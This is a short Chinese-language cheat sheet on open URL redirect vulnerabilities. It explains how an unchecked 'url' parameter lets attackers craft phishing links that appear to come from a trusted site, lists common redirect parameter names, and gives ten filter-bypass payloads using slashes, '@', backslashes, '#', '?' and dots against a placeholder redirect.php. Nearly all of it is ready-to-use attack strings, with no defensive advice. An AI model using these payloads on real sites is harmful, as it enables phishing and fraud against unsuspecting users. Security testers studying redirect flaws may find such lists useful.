什么是url跳转?
url没有任何限制,所以恶意用户可以提交http://www.aaa.com/1.php?url=http://bbb.com(钓鱼网站)来生成自己的恶意链接,安全意识较低的用户很可能会以为该链接展现的内容是www.aaa.com从而可能产生欺诈行为。
参数下手:
♾️ abap 代码:redirect
redirect_to
redirect_url
url
jump
jump_to
target
to
link
linkto
domain
...
比如:/redirect.php?url=/yunmenng.cf
绕过方式:
1.单斜线"/"绕过:
♾️ abap 代码:http://123123.men/redirect.php?url=/123123.men
2.缺少协议绕过:
♾️ abap 代码:http://123123.men/redirect.php?url=//123123.men
3.多斜线"/"前缀绕过:
♾️ abap 代码:http://123123.men/redirect.php?url=///123123.men
4.利用"@"符号绕过:
♾️ abap 代码:http://123123.men/redirect.php?url=http://www.xxx.com@123123.men
5.利用反斜线"\"绕过:
♾️ abap 代码:http://123123.men/redirect.php?url=http://www.xxx.com\123123.men
6.利用"#"符号绕过:
♾️ abap 代码:http://123123.men/redirect.php?url=http://www.xxx.com#123123.men
7.利用"?"号绕过:
♾️ abap 代码:http://123123.men/redirect.php?url=http://www.xxx.com?123123.men
8.利用"\"号绕过:
♾️ abap 代码:http://123123.men/redirect.php?url=http://www.xxx.com\\123123.men
9.利用"."绕过:
♾️ abap 代码:http://123123.men/redirect.php?url=.123123.men
10.重复字符绕过:
♾️ abap 代码:http://123123.men/redirect.php?url=///123123.men//..
http://123123.men/redirect.php?url=123123.men//..